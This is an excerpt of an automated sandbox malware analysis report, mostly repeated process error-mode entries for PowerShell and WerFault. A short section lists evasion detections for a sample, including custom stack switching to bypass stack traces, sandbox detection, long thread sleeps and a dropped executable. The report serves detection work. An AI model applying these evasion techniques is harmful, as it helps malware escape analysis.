                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFDB442D044
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 57EB83A
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802573610.00000000043C9000.00000040.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2759956184.0000000002729000.00000040.00000400.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2765700918.0000000002729000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeBinary or memory string: CFF EXPLORER.EXE
                    Source: 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2802573610.00000000043C9000.00000040.00001000.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000020.00000002.2801601594.00000000005E8000.00000040.00000001.01000000.0000000F.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2759956184.0000000002729000.00000040.00000400.00020000.00000000.sdmp, 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, 00000021.00000003.2765700918.0000000002729000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593272
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593145
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593018
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592893
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592763
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592642
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592518
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592394
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3560Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6277Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7124
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2533
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeDropped PE file which has not been started: C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep count: 3560 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep count: 6277 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5640Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6096Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 7220Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9028Thread sleep count: 7124 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -22136092888451448s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9148Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9016Thread sleep count: 2533 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -593272s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -593145s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -593018s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -592893s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -592763s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -592642s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9096Thread sleep time: -592518s >= -30000s
